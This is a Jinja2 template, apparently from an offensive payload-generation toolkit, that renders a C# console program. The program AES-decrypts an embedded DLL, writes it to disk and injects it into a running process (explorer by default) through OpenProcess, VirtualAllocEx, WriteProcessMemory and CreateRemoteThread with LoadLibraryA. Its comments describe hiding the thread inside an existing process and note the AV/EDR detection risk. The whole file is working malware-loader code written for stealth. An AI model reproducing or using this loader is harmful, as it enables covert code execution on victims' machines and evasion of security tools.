{# load-library.jinja #}
{#
    This Jinja2 template includes a C# console app that
    load a **decrypted** dll into memory.

    It also uses the OpenProcess() and CreateRemoteThread()
    API calls to 'hide' the thread in a existing windows
    process.

    IMPORTANT: The library given in input must have a
    'DllMain()' function so it can receive call from
    the Windows's API function 'LoadLibraryA()'.

    NOTICE: As the dll is written to disk in clear, it can
    trigger AV/EDR detection and be flagged accordingly.
#}
using System;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Security.Cryptography;

class Program
{
    {# Include hex string to byte array conversion function #}
    {% include "csharp/transform/hexstr2bytearray.jinja" %}
    {# Include AES decryption function #}
    {% include "csharp/decrypt/aes-dotnet.jinja" %}

    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
    [DllImport("kernel32.dll")]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes,  uint dwStackSize, IntPtr lpStartAddress,
    IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true,
    SetLastError = true)]
    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    public static extern IntPtr GetModuleHandle(string lpModuleName);

    static void Main(string[] args)
    {
        string password = "{{ password }}";
        int iterations = {{ iter }};
        int keySize = {{ key_size }};

        string salt = "{{ salt }}";
        string iv = "{{ iv }}";
        byte[] saltBytes = HexStringToByteArray(salt);
        byte[] ivBytes = HexStringToByteArray(iv);

        string ciphertext = {{ ciphertext }}
        byte[] encryptedBytes = Convert.FromBase64String(ciphertext);

        byte[] decryptedData;
        decryptedData = DecryptAES(encryptedBytes, keySize, password, iterations, saltBytes, ivBytes);

        String dir = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
        {% if args.dllname is defined %}
        String dllPath = dir + "{{ args.dllname }}";
        {% else %}
        String dllPath = dir + "{{ iv }}.dll";
        {% endif %}

        using (BinaryWriter binWriter = new BinaryWriter(File.Open(dllPath, FileMode.Create)))
        {
            binWriter.Write(decryptedData);
        }

        {% if args.process is defined %}
        Process[] eProc = Process.GetProcessesByName("{{ args.process }}");
        {% else %}
        Process[] eProc = Process.GetProcessesByName("explorer");
        {% endif %}
        int eppid = eProc[0].Id;
        IntPtr hProcess = OpenProcess(0x001F0FFF, false, eppid);

        IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
        IntPtr outSize;
        Boolean res = WriteProcessMemory(hProcess, addr, Encoding.Default.GetBytes(dllPath), dllPath.Length, out outSize);
        IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
        IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero);
    }
}